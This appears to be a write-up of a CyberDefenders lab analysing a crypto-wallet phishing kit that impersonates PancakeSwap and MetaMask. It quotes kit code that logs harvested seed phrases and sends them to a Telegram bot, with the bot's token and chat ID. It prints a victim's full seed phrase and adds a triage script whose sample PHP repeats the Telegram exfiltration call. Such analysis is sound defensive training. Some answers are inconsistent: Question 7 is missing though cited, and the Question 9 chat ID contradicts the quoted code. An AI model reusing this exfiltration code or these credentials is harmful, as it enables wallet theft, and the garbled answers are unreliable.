
GrabThePhisherLab

CYBERDEFENDERS

5/18/2024

The GrabThePhisher lab requires the examination of a phishing kit to find the flags.

Scenario

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name "pankewk.zip".

Provided with the phishing kit, you, as a SOC analyst, are requested to analyze it and do your threat intel homework.

-------------------------------------------------------------------------

Tools Used

This lab did not require any tools other than a regular text editor, a browser and/or a terminal.

Writeup

  • Question 1: Which wallet is used for asking the seed phrase?

    -> We examine the files in the download folder (pass: cyberdefenders.org) and open index.html. Now we can try all the buttons on the left; only one of them opens a new window -> MetaMask

    Answer: Metamask

  • Question 2: What is the file name that has the code for the phishing kit?

    -> We have a look at the folders again and see there is a folder called "metamask", so let's check it out. We find the index.html and also another file named "metamask.php"; let's open it.

    We see there is a comment:

    /*
    With love and respect to all the hustler out there,
    This is a small gift to my brothers,
    All the best with your luck,
    Regards,
    j1j1b1s@m3r0
    */

    Sounds like this file was created by our threat actor, and we have the next flag.

    Answer: metamask.php

  • Question 3: In which language was the kit written?

    -> This one is really simple. The filename gives us the language, and so does the first line of the file: <?php

    Answer: PHP

  • Question 4: What service does the kit use to retrieve the victim's machine information?

    -> Now we have to examine the file. Let's look at the first request that is made. It goes to api[.]sypexgeo[.]net, and a quick Google search reveals: "Sypex Geo - a product for determining the location of a visitor by IP address, from the creators of Sypex Dumper." So this is how the victim's info was retrieved.

    Answer: Sypex Geo (mind the space here)

  • Question 5: How many seed phrases were already collected?

    -> Let's go further down in the code for this one. The important part is this line:

    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);

    This tells us that there is a log file named "log.txt" being appended to in /log/.

    If we go there, we find 3 entries.

    Answer: 3

  • Question 6: Write down the seed phrase of the most recent phishing incident?

    -> We just copy the third entry.

    Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey

  • Question 8: What is the token for the channel?

    -> We can backtrack the code to the lines before the one from Question 7:

    function sendTel($message){
        $id = "5442785564";
        $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";

    Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

  • Question 9: What is the chat ID of the phisher's channel?

    -> We can backtrack the code to the lines before the one from Question 7:

    function sendTel($message){
        $id = "5442785564";
        $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";

    Answer: 442785564
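    The checks from Questions 4, 5, 8 and 9 (the geolocation API host, the log file and its entry count, the Telegram bot token and chat ID) can be automated into a small static triage script. The script below is an added example written for this writeup; it is not code from the lab, from CyberDefenders or from the kit. The PHP and log.txt samples inside it are constructed stand-ins assembled from the lines quoted above: the exact `sendMessage` URL, the log field layout and the variable name `$id` carrying the chat ID are assumptions, so the regexes are heuristics tuned to this kit rather than a general-purpose extractor.

```python
import re

# Constructed sample: a condensed stand-in for the kit's metamask.php, built only
# from the lines quoted in this writeup. It is NOT the kit's actual source file;
# the Sypex request line and the Telegram sendMessage call are assumptions.
SAMPLE_PHP = r'''<?php
$geo = json_decode(file_get_contents("https://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']));
function sendTel($message){
    $id = "5442785564";
    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
    file_get_contents("https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message));
}
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
'''

# Constructed sample log.txt with three appended entries. The field layout is an
# assumption for the demo; the kit's real log content is not reproduced here.
SAMPLE_LOG = (
    "IP: 203.0.113.10 | Seed: placeholder seed phrase one\n"
    "IP: 198.51.100.7 | Seed: placeholder seed phrase two\n"
    "IP: 192.0.2.55 | Seed: placeholder seed phrase three\n"
)

# Telegram bot tokens are "<numeric bot id>:<35-char secret>".
TOKEN_RE = re.compile(r'\b\d{8,10}:[A-Za-z0-9_-]{35}\b')
# Hostnames of every http(s) URL the kit talks to (geolocation, exfil channel).
HOST_RE = re.compile(r'https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})')
# Which PHP variable is concatenated right after "chat_id=" (heuristic).
CHAT_VAR_RE = re.compile(r'chat_id=["\']\s*\.\s*\$(\w+)')
# First argument of an appending file_put_contents call (the log path expression).
APPEND_RE = re.compile(r'file_put_contents\(\s*(.+?),\s*\$\w+\s*,\s*FILE_APPEND', re.S)
# Single- or double-quoted string literals inside a PHP expression.
LITERAL_RE = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def _assigned_value(src, var):
    """Return the quoted literal assigned to $var, or None if not found."""
    m = re.search(r'\$' + re.escape(var) + r'\s*=\s*["\']([^"\']*)["\']', src)
    return m.group(1) if m else None


def _literal_path(expr):
    """Collapse a concatenated PHP path expression to its literal parts."""
    expr = re.sub(r"\$_SERVER\[['\"]DOCUMENT_ROOT['\"]\]", "", expr)
    return "".join(a or b for a, b in LITERAL_RE.findall(expr))


def defang(host):
    """Make a hostname safe to paste into a report (api[.]example[.]net)."""
    return host.replace(".", "[.]")


def triage_kit(src):
    """Extract reportable indicators from the kit's PHP source."""
    tokens = sorted(set(TOKEN_RE.findall(src)))
    chat_ids = []
    for var in CHAT_VAR_RE.findall(src):
        val = _assigned_value(src, var)
        if val and val not in chat_ids:
            chat_ids.append(val)
    hosts = sorted(set(HOST_RE.findall(src)))
    log_paths = sorted({_literal_path(e) for e in APPEND_RE.findall(src)})
    return {
        "telegram_tokens": tokens,
        # The numeric prefix of a token is the bot account's own id; it is not
        # the chat the messages land in, so report both separately.
        "telegram_bot_ids": [t.split(":")[0] for t in tokens],
        "chat_ids": chat_ids,
        "external_hosts": hosts,
        "external_hosts_defanged": [defang(h) for h in hosts],
        "log_paths": log_paths,
    }


def log_summary(log_text):
    """Count non-empty entries in the harvested-data log and return the latest."""
    entries = [line for line in log_text.splitlines() if line.strip()]
    return {"count": len(entries), "latest": entries[-1] if entries else None}


if __name__ == "__main__":
    for key, value in triage_kit(SAMPLE_PHP).items():
        print(f"{key}: {value}")
    print(f"log: {log_summary(SAMPLE_LOG)}")
```

    Run it as a plain script; for a real kit, read metamask.php and log/log.txt from the extracted archive instead of the embedded samples. The bot id (token prefix) and the chat id are what an abuse report to Telegram needs, and the defanged hosts go straight into the threat intel note.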

  • Question 10: What are the allies of the phish kit developer?

    -> We go back to the text I mentioned in Question 2 and check the name:

    /*
    With love and respect to all the hustler out there,
    This is a small gift to my brothers,
    All the best with your luck,
    Regards,
    j1j1b1s@m3r0
    */


    Answer: j1j1b1s@m3r0